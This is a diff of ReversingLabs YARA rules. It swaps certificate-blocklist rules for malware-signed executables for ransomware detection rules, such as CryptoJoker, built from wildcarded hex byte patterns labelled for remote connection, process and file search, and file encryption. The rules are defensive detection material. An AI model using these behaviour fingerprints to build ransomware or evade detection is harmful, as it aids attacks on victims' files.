-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Ringen" and pe.signatures [ i ] . serial == "1f:23:f0:01:45:87:16:d4:35:cc:a1:a5:5d:66:0e:c5" and 1603176940 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_6E0Ccbdfb4777E10Ea6221B90Dc350C2 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "64007bd7-b273-5579-8224-68337f1bc54d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5974-L5990"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "08a1ff7cc3a7680fdbb3235a7b46709cd4ba530a9afeab4344671db9fe893cc4"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$remote_connection = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
+            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83
+            C4 ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? FF B5 ??
+            ?? ?? ?? 89 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 6A ??
+            6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF D3 8B 3D ?? ?? ?? ?? 6A ?? 56 FF D7 8D 45 ?? 50
+            8D 45 ?? 50 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 50 89 85 ?? ?? ??
+            ?? FF D3 8B 9D ?? ?? ?? ?? 6A ?? 53 FF D7 68 ?? ?? ?? ?? 33 FF E8 ?? ?? ?? ?? 83 C4
+            ?? 8B F0 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 39 7D ?? 76 ?? 68 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 6A ?? 51 50
+            56 FF B5 ?? ?? ?? ?? 03 F8 FF 15 ?? ?? ?? ?? 39 7D ?? 77 ?? 8B 85 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 C4 ?? 53 FF D6 FF B5 ??
+            ?? ?? ?? FF D6 FF B5 ?? ?? ?? ?? FF D6 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5
+            5D C3
+        }
+		$search_processes = {
+            6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 51 50
+            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 0F 1F
+            44 00 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 8B 4C B5 ??
+            8D 85 ?? ?? ?? ?? 0F 1F 44 00 ?? 8A 11 3A 10 75 ?? 84 D2 74 ?? 8A 51 ?? 3A 50 ?? 75
+            ?? 83 C1 ?? 83 C0 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 75 ?? FF B5 ?? ??
+            ?? ?? 50 68 ?? ?? ?? ?? FF D7 6A ?? 50 FF D3 46 83 FE ?? 76 ?? 8D 85 ?? ?? ?? ?? 50
+            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B
+            E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ??
+            ?? ?? 31 45 ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 8B 4D
+            ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? 83 CB ?? 89
+            5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 F6 89 75 ?? 89 75 ?? 56 68 ?? ??
+            ?? ?? 6A ?? 56 6A ?? 6A ?? 51 8B 3D ?? ?? ?? ?? FF D7 89 45 ?? 3B C3 0F 84 ?? ?? ??
+            ?? 56 68 ?? ?? ?? ?? 6A ?? 56 6A ?? 6A ?? FF 75 ?? FF D7 8B D8 89 5D ?? 83 FB ?? 0F
+            84 ?? ?? ?? ?? 8B 7D ?? 8B 07 85 C0 0F 84 ?? ?? ?? ?? 8D 4D ?? 51 56 56 68 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 50 FF
+            75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ??
+            FF 75 ?? 68 ?? ?? ?? ?? FF 37 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 32 C0 89 45 ?? 88
+            45 ?? 33 FF 89 7D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 FF 75
+            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 0F B6 C0 81 7D ?? ?? ?? ?? ??
+            B9 ?? ?? ?? ?? 0F 42 C1 89 45 ?? 88 45 ?? 68 ?? ?? ?? ?? 8D 4D ?? 51 56 6A ?? 0F B6
+            C0 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 85 FF 75 ?? 57 8D 45 ?? 50 68 ??
+            ?? ?? ?? FF 35 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 56 53 FF
+            15 ?? ?? ?? ?? 85 C0 74 ?? 47 89 7D ?? 8B 45 ?? 84 C0 0F 84 ?? ?? ?? ?? 80 7D ?? ??
+            74 ?? 83 05 ?? ?? ?? ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8A 45 ??
+            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+		$search_files_in_specific_folders_p1 = {
+            51 8D 85 ?? ?? ?? ?? 8B CE 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 8B F0 F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ??
+            ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
+            83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 FF
+        }
+		$search_files_in_specific_folders_p2 = {
+            75 ?? FF 75 ?? 8D 55 ?? 8B CB 57 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85
+            F6 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 FF ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 8D 55 ?? 8B
+            CB 57 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 85 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01 41
+            84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 83 EC ?? 8D
+            4D ?? E8 ?? ?? ?? ?? 6A ?? 40 8D 4D ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0
+            8D 45 ?? 3B C6 74 ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 56 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            EC ?? C6 45 ?? ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83 EC ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83
+            EC ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FF ?? 75 ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50
+            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 84
+            C0 8D 8D ?? ?? ?? ?? 0F 94 C3 EB ?? 83 FF ?? 75 ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50 8D
+            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 8A D8
+        }
+		$search_files_in_specific_folders_p3 = {
+            8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 DB 8B 9D ?? ?? ?? ?? 74 ?? 8D 45 ??
+            8B CB 50 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
+            83 F8 ?? 0F 84 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75
+            ?? 33 F6 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF B5 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 85 ?? ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 4D ??
+            E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ??
+            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ??
+            ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ??
+            ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? C7 45
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 4D ?? 64 89 0D ?? ??
+            ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TRAUMALAB INTERNATIONAL APS" and pe.signatures [ i ] . serial == "6e:0c:cb:df:b4:77:7e:10:ea:62:21:b9:0d:c3:50:c2" and 1603046620 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $search_processes and ( all of ( $search_files_in_specific_folders_p* ) ) and $encrypt_files and $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0Ed1847A2Ae5D71Def1E833Fddd33D38 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Cryptojoker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects CryptoJoker ransomware."
 		author = "ReversingLabs"
-		id = "11fd3bbe-5d15-57b7-a461-fc9c90046dbc"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "50a9280b-a352-5a2b-acee-5690e509dfd7"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5992-L6008"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0ec5eb8ff1f630284fabfba5c58dd563d471343ace718f79dad08cfe75c3070d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.CryptoJoker.yara#L1-L140"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "42ee1e63ada1ae986f43a1300eda0b1fa7b54c26be31ef5637bb321defffbe40"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "CryptoJoker"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SNAB-RESURS, OOO" and pe.signatures [ i ] . serial == "0e:d1:84:7a:2a:e5:d7:1d:ef:1e:83:3f:dd:d3:3d:38" and 1598662800 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_97Df46Acb26B7C81A13Cc467B47688C8 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "68e2fdc7-61cd-5e0a-8bc7-5e0ca96271c5"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L6010-L6028"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6f6e0e175caee83eaec2dacedaf564b642195a8815cfd0d4564f581070b0c545"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$call_encrypt = {
+            2B 02 26 16 FE 09 00 00 FE 09 01 00 FE 09 02 00 6F ?? ?? ?? ?? 2A
+        }
+		$encrypt_files = {
+            2B 02 26 16 20 04 ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 26 20 00 04 ?? ?? 73 ?? ?? ?? ?? 0C 20 05 ?? ?? ??
+            16 39 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 0B 38 ?? ?? ?? ?? 20 04 ?? ?? ?? FE ?? ?? ?? FE ?? ??
+            ?? 45 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 38 ?? ?? ?? ?? 26
+            20 03 ?? ?? ?? 16 39 ?? ?? ?? ?? 26 00 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 39 ??
+            ?? ?? ?? 26 20 00 ?? ?? ?? 38 ?? ?? ?? ?? 00 00 08 06 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ??
+            ?? ?? 26 20 03 ?? ?? ?? 38 ?? ?? ?? ?? 09 28 ?? ?? ?? ?? 13 04 20 04 ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ??
+            26 00 08 07 17 28 ?? ?? ?? ?? 0D 38 ?? ?? ?? ?? 20 03 ?? ?? ?? FE ?? ?? ?? FE ?? ?? ?? 45 ?? ?? ?? ?? ?? ??
+            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 38 ?? ?? ?? ?? 26 20 02 ?? ?? ?? 38 ?? ?? ?? ?? 11 04
+            13 05 DD ?? ?? ?? ?? 00 08 16 28 ?? ?? ?? ?? 00 00 DC 08 14 FE 01 13 06 11 06 3A ?? ?? ?? ?? 08 28 ?? ?? ??
+            ?? 00 DC 00 11 05 2A
+        }
+		$start_process = {
+            2B ?? 26 16 20 10 ?? ?? ?? 38 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 20 ?? ?? ?? ??
+            38 ?? ?? ?? ?? 00 11 05 17 28 ?? ?? ?? ?? 20 06 ?? ?? ?? 38 ?? ?? ?? ?? 00 28 ?? ?? ?? ??
+            0A 20 09 ?? ?? ?? 38 ?? ?? ?? ?? 00 11 05 08 28 ?? ?? ?? ?? 20 12 ?? ?? ?? 38 ?? ?? ?? ??
+            11 06 17 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 38
+            ?? ?? ?? ?? 11 05 17 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 38 ?? ?? ?? ?? 11 06 19 20 ?? ?? ?? ??
+            28 ?? ?? ?? ?? A2 20 0F ?? ?? ?? 38 ?? ?? ?? ?? 1A 8D ?? ?? ?? ?? 13 06 20 02 ?? ?? ?? 38
+            ?? ?? ?? ?? 00 11 04 28 ?? ?? ?? ?? 26 20 13 ?? ?? ?? 38 ?? ?? ?? ?? 08 09 28 ?? ?? ?? ??
+            20 07 ?? ?? ?? 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 05 38 ?? ?? ?? ?? 26 20 0D ?? ?? ?? 38 ??
+            ?? ?? ?? 11 06 0D 38 ?? ?? ?? ?? 20 10 ?? ?? ?? FE ?? ?? ?? FE ?? ?? ?? 45 ?? ?? ?? ?? ??
+            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
+            ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 20 08 ?? ?? ?? 17 3A ?? ?? ?? ??
+            26 11 06 18 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 20 00 ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ??
+            26 06 07 28 ?? ?? ?? ?? 0C 20 0B ?? ?? ?? 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 26 11 06 16 20 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? A2 17 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? 26 20 03 ?? ?? ?? 16 39 ?? ??
+            ?? ?? 26 00 11 04 11 05 28 ?? ?? ?? ?? 20 0A ?? ?? ?? 17 3A ?? ?? ?? ?? 26 00 73 ?? ?? ??
+            ?? 13 04 20 04 ?? ?? ?? 38 ?? ?? ?? ?? 2A
+        }
+		$msgbox_timer = {
+            00 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 28 ?? ?? ?? ?? 0C
+            00 02 7B ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 DE 12 08 14 FE 01
+            13 04 11 04 2D ?? 08 6F ?? ?? ?? ?? 00 DC 00 02 7B ?? ?? ?? ?? 16 32 0E 02 7B
+            ?? ?? ?? ?? 16 FE 04 16 FE 01 2B ?? 16 00 13 04 11 04 2D ?? 00 02 7B ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 38 ?? ?? ?? ?? 02 7B ??
+            ?? ?? ?? 2D ?? 02 7B ?? ?? ?? ?? 2D ?? 02 7B ?? ?? ?? ?? 16 FE 01 16 FE 01 2B
+            ?? 17 00 13 04 11 04 2D ?? 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ??
+            ?? 0D 09 17 6F ?? ?? ?? ?? 00 09 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 1F 40 28 ??
+            ?? ?? ?? 26 00 38 ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 17 FE 04 16 FE 01 13 04 11
+            04 2D ?? 00 02 1F 3B 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 FE 04 16 FE 01 13 04
+            11 04 2D ?? 00 02 1F 3B 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 16 FE 01 13 04 11 04
+            2D ?? 02 25 7B ?? ?? ?? ?? 17 59 7D ?? ?? ?? ?? 00 2B ?? 02 25 7B ?? ?? ?? ??
+            17 59 7D ?? ?? ?? ?? 00 2B ?? 02 25 7B ?? ?? ?? ?? 17 59 7D ?? ?? ?? ?? 02 7B
+            ?? ?? ?? ?? 1F 09 FE 02 16 FE 01 13 04 11 04 2D ?? 02 7B ?? ?? ?? ?? 02 7C ??
+            ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2B ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ??
+            ?? 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ??
+            ?? ?? ?? 1F 09 FE 02 16 FE 01 13 04 11 04 2D ?? 02 7B ?? ?? ?? ?? 02 7C ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2B ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ??
+            02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ??
+            ?? ?? 1F 09 FE 02 16 FE 01 13 04 11 04 2D ?? 02 7B ?? ?? ?? ?? 02 7C ?? ?? ??
